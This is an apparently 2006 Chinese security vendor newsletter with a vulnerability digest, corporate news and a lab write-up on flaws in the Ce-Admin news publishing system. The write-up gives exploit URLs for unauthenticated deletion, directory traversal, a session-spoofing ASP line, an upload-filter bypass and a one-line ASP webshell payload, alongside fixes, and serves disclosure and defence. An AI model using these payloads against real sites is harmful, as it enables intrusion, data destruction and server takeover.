2006年3月刊  总第48期
 
  neteye.neusoft.com

查阅过往期刊

订 阅

退 订

 
   

刊首语
[NetEye技术]
    
三月份安全漏洞
    Ce-Admin新闻发布系统漏洞分析
[NetEye荣誉]
    东软网上银行安全防护荣获天极网2005年度优秀解决方案奖
[NetEye动态]
    东软网络安全华东销售规划会议圆满结束
    东软NetEye出席“2006年中国计算机网络安全应急年会暨中国
    互联网协会网络安全工作年会”

    东软NetEye出席国信办《关于开展信息安全风险评估工作的意
    见》宣贯会

    东软NetEye亮相浙江省信息安全高峰论坛
[NetEye渠道]
    诺基亚—东软06年三地春季渠道合作伙伴产品培训圆满结束
    

刊 首 语


                                        文:路娜

  时间带着东软安全奔跑了一个月,并不停的把我们雕刻着,在繁忙的工作中,留下了许多东软安全人的身影,在影子上也烙下了许多感动的印痕。

  网络安全产业的生命力是无穷尽的,在发展中东软安全正在以自主创新的技术和深厚的优质服务不断的磨练自己,在为用户提供增值安全服务的同时,也在提升自己的价值。本期东软安全攻防实验室就为我们的用户发布了最新的Ce-Admin新闻发布系统漏洞,而在中国IT权威网媒《天极网》举办的“2006年信息化应用年会暨2005年信息化应用典范颁奖”盛会上,东软安全再次以超越的技术实力捧回了在网上银行安全防护领域的“优秀解决方案奖”桂冠。

  在3月春暖鸭先知的季节里,东软安全人没有时间欣赏嫩绿的树牙和盛开的鲜花,而是马不停蹄的从华北飞到华东,从楚地跨到蜀地,规划部署以服务用户为中心的全年营销策略和计划。同时积极推进国际化进程,全面启动了与NOKIA联合新产品的全国渠道战役。

  3月我们不仅把春天等来了,我们也有信心一定品尝到那盛夏的果实。


  三月份安全漏洞

  漏洞名称:Microsoft Visual Studio DBP和SLN文件DataProject字段缓冲区溢出漏洞

  类型:边界检查错误

  存在漏洞系统:Microsoft Visual Studio <=6.0 SP5

  危险等级:

  CVE编号:CVE-2006-1043

  BUGTRAQ编号:16953

  发布时间:2006-03-04

  攻击及危害:远程攻击者构造恶意的dbp和sln文件诱使用户使用Visual Studio打开,从而执行其构造的指
        令,进一步控制系统。

  安全建议:对.dbp和.sln文件特别进行关注,不随意接受别人发送的此类文件。


  漏洞名称:Microsoft Office 中的漏洞可能允许远程执行代码(MS06-012)

  类型:边界检查错误

  存在漏洞系统:Microsoft OfficeXP SP3
          Office2003 SP2
          Office2003 SP1
          Office2K SP3

  危险等级:

  CVE编号:CVE-2005-4131,CVE-2006-0009,CVE-2006-0028,CVE-2006-0030,2006-0031

  BUGTRAQ编号:15780,17000,16181,17101

  发布时间:2006-03-14

  攻击及危害:通过电子邮件或者通过网站诱使用户访问或者打开攻击者构造的恶意Office文件,从而执行内
        部隐藏的指令,进而控制系统。


  病毒名称:利用IE高危漏洞的攻击bid:17196

  类型:网页木马

  受影响系统:IE 6.X、IE7Beta2

  特征:一般通过http实现,用户浏览网页后,恶意代码被执行,自动下载木马或者其他文件并执行

  损失及危害:如果成功,远程攻击者可以利用此漏洞在用户机器上执行任意指令。

  安全建议:微软目前还没有发布补丁程序。
       临时解决办法:禁用不可信任用户的活动脚本。
       用户需要及时关注厂商主页获取更新,谨慎对待他人发送的网页链接。

  >>>查看全文

 

  Ce-Admin新闻发布系统漏洞分析

Ce-Admin新闻发布系统漏洞分析
东软 攻防实验室
2006年3月

  Ce-Admin是一款应用广泛的新闻发布系统,该新闻发布系统目前主要用于图片新闻的发布,由于能生成html,浏览速度很快,目前发现至少有4个修改版本,用户群广大,虽然经过了修改,但是还是存在安全隐患。

  1、漏洞分析

    ◆ 管理目录下del.asp、save.asp来源未检查漏洞
      由于del.asp和save.asp没有对来源进行检查,可以导致攻击者匿名就可以进行新闻以及新闻分类的
      删除,还可以非法进行新闻的添加、修改。
      来看del.asp中删除分类功能的代码:

图1:删除分类部分代码


      通过提交如下url可以删除id为15并且名称为“security”的分类:
      http://target/ce-admins/Del.asp?ID=15&Type=NewsClass&News_Class=security(url1)
      再看del.asp中删除新闻功能的代码:

图2:删除新闻部分代码


      通过提交如下url可以删除数据库中记录以及生成的html文件:
      http://target/ce-admins/Del.asp?File_Name=20060309131700.html&Type=News
      由于未进行来源的验证,本地构造表单可以进行新闻的添加和修改,来看这部分代码:

图3:新闻添加功能部分代码


      需要4个参数,构造表单,设置Post地址为:http://target/ce-admins/save.asp?Type=add可以完成
      文章的添加。而对指定ID新闻的修改只需要将上述表单的post地址改为:
      http://target/ce-admins/save.asp?Type=edit&ID=11

    ◆ 管理目录下save.asp导致网站web路径暴露漏洞
      进行新闻的批量生成时,save.asp会暴露服务器路径,由于没有来源检查,匿名用户只要提交如下
      url就可以知道网站web路径:(b_id为需批量生成的起始新闻id,e_id为结束id)
      http://target/ce-admins/Save.asp?Type=update&b_id=1&e_id=11111

图4:网站web路径暴露

    ◆ session欺骗漏洞
      ce-admin系统对管理员的验证通过session实现,具体文件为check.asp。
      可以构造包含如下内容的asp文件,浏览后再访问ce-admins下的admin_index.asp即可进入管理页
      面。
      <%Session("Name") = "hacker"%>
      缓解因素:攻击者首先需要取得web服务器上其他站点的webshell权限,主要影响对象为虚拟主机。

    ◆ 所带ewebeditor编辑器session欺骗漏洞
      与Ce-Admin系统的类似,不再分析。

    ◆ 所带ewebeditor编辑器admin_uploadfile.asp目录遍历以及文件删除漏洞
      该asp文件是用来管理上传文件的,但是可以构造dir参数进行目录的遍历
      通过提交http://target/uploadfile/admin_uploadfile.asp?id=14&dir=../../
      可以遍历目录,并且可以进行非授权文件的删除操作。
      缓解因素:首先需要取得ewebeditor的后台权限。

    ◆ 所带ewebeditor编辑器upload.asp文件上传漏洞
      上传通过upload.asp来实现,除了设置的扩展名外,还对asp文件进行了限制:

图5:对asp文件的限制


      设置任何情况均不允许上传asp文件,突破方法是在上传文件设置里设置允许上传扩展名为aaspsp的
      文件,因为程序检查扩展名时把asp替换为Null,那么aaspsp就变成asp,就可以上传asp文件了。还
      可以设置允许上传asa、cer等也能被asp.dll解析的文件来达到目的。
      缓解因素:首先需要取得ewebeditor的后台权限。
      注:以上ewebeditor编辑器的漏洞在最新免费版本2.8修正版中也存在,商业版未做测试。

  2、其他修改版本简单分析

  其他修改版本中的玩乐吧版,直接把数据库改成了#$%mmpic%$#.asp,初衷是为了防止下载,虽然通过http://target/data/#$%mmpic%$#.asp 不能下载,但是用flashget下载如下url则可以下载:http://target/data/#$%mmpic%$#.asp
  这里涉及url编码的问题,因为#$%是非数字和字母,字母不需要编码,如果编码也是可以识别的,编码的规则是%加ascii码的16进制,#$%的ascii码为35、36和37,16进制则是23、24和25。因此#$%mmpic%$#的url编码是%23%24%25mmpic%25%24%23。
  Ce-Admin的密码是明文的,所以下载数据库后用access打开可以得到管理员密码直接登 陆管理页面,然后添加新闻,或者构造表单添加新闻,在标题内输入一句话asp木马:
  <SCRIPT RUNAT=SERVER LANGUAGE=JAVASCRIPT>eval(Request.form('#')+'')</SCRIPT>
发布后,http://target/data/#$%mmpic%$#.asp成了webshell,可以上传其他asp木马进行其他非授权的活动,甚至提升权限得到系统管理权限。

  3、漏洞防范

    ◆ del.asp和save.asp
      针对del.asp和save.asp的来源未检查以及web路径暴露漏洞,我们在这两个文件中加上头文件: <!--#include file="check.asp"--> ,check.asp文章系统自带。

    ◆ session欺骗漏洞
      对于session欺骗,相关的是cookie欺骗,相对来说session比cookie更安全一些,因此我们不建议你
      改用cookie验证。建议选择设置比较安全的虚拟主机,并加强对服务器的安全管理。

    ◆ 目录遍历漏洞
      在admin_upload.asp中找到sDir = Trim(Request("dir")这行,修改为:
      sDir = Replace(Trim(Request("dir")),"..", "/")

    ◆ ewebeditor上传漏洞
      可以把upload.asp文件中的sAllowExt = Replace(UCase(sAllowExt), "ASP", "")改为:

  >>>查看全文

 

  东软网上银行安全防护荣获天极网2005年度优秀解决方案奖

                                        文:闫洁

  2006年3月22日,中国最大的IT门户网站天极网主办的“2006年信息化应用年会暨2005年信息化应用典范颁奖”在人民大会堂隆重举行,众多行业的知名企业CIO、40多家主流媒体和20多家主流信息化供应商共聚一堂,共同探讨中国信息化应用的成功之道。25家“2005年度信息化应用典范”企业出席了年会,作为中国领先的软件和解决方案提供商东软软件股份有限公司应邀参与了此次会议,并取得网上银行安全防护领域优秀解决方案奖的称号。

  东软NetEye网络安全产品线作为东软的核心业务一直秉承以客户为中心,以市场为导向不断推出高品质的信息安全产品和专业化的信息安全服务,公司投入大量的资金和高技术人才从事网络安全产品的研究 、开发设计工作。安全产品已广泛的应用于政府、公安、金融、电信、教育、能源等行业,并赢得用户的广泛赞誉。针对银行网络的特点,东软股份自行开发了具有自主版权的一系列网络安全产品:东软NetEye防火墙和东软NetEye IDS 等高端产品是东软股份开发的具有自主版权的专门为金融行业利用独创的数据包截取技术对网络进行不间断的监控,扩大网络防御的纵深,采用先进的基于网络数据流实时智能分析技术判断来自网络内部和外部的入侵企图,进行报警,响应和防范。

  网络安全是一个系统的、全局的管理问题,网络上的任何一个漏洞,都会导致全网的安全问题,随着网络建设的不断发展,网上银行系统直接承受来自Internet社区的巨大安全压力,在进行网上银行建设时,需同时考虑对网上银行和银行业务系统二者的安全防护建设。东软应用系统工程的观点、方法,分析网络的安全及具体措施,从系统综合整体的角度去看待、分析,并取得有效、可行的措施。东软强大的研发团队将进一步为网上银行的安全防护工作添砖加瓦,为网上银行的围墙更加坚固继续研发工作。


  东软网络安全华东销售规划会议圆满结束

                                        文:路娜

简讯:

  3月11日-12日为期两天的东软网络安全华东销售规划会议在上海分公司圆满落下帷幕。东软股份华东大区领导和网络安全营销中心领导以及网络安全华东全体销售人员和技术人员参加了本次会议。

  会议期间大家就一些主题报告展开了详细且充分的讨论,提出了很多意见,各位领导对相应问题做了仔细说明。会议期间大家就2006年网络安全在华东地区的销售策略、经营指标、市场计划、人力资源等重点工作达成一致认同,明确了各自分工和2006年的重点工作目标以及实施计划。

  最后华东大区总经理李军以及营销中心副总王志刚对所有参会者提出,随着安全新产品和公司RND的推进,公司安全发展策略越加稳健。东软作为一个有社会责任的企业 ,将在2006年在安全产品线上更具有核心竞争力,产品的差异化竞争也更明显,东软NetEye在各个行业上的技术积累和对行业系统的深度理解比对手更具有的优势是 ,随着东软NetEye新M类安全产品的不断推出,华东大区对2006年经营指标的完成充满信心。


  更多动态
  · 东软NetEye出席“2006年中国计算机网络安全应急年会暨中国互联网协会网络安全工作年会”(文:李军)
  ·
东软NetEye出席国信办《关于开展信息安全风险评估工作的意见》宣贯会(文:李军)
  ·
东软NetEye亮相浙江省信息安全高峰论坛(文:李军)

  诺基亚—东软06年三地春季渠道合作伙伴产品培训圆满结束

                                        文:闫洁

  继2005年底移动通信的全球领先者诺基亚和中国领先的软件和解决方案提供商东软软件股份有限公司正式宣布在网络安全领域展开战略合作并在北京、广州、上海三地对已有代理商进行培训后,近日“N-N组合”借北京春风送暖之时再次开展对三地渠道合作伙伴的产品培训。3月14日、16日、22日分别在北京、广州、上海将诺基亚、东软的网络安全产品技术、分销政策再次渗透到渠道代理商中间。

  本次培训不仅有双方公司已有的代理商参与,同时也邀请了在三地具有实力的合作伙伴参与其中。在刚刚结束的北京、广州两地活动中分别聚集了华北及华南颇具实力的优质代理商、集成商。各公司渠道经理齐聚一堂与诺基亚、东软公司销售、技术工程师共同研讨2006年网络安全市场发展趋势与策略。

  >>>查看全文


  十分感谢您阅读NetEye安全月刊,我们真诚的希望大家通过这个平台交流NetEye使用经验,提出您的宝贵意见,东软资深安全顾问将竭诚为您提供全面服务。欢迎您发表高论:neteye@neusoft.com

沈阳东软软件股份有限公司 网络安全事业部
客户服务热线:400-655-6789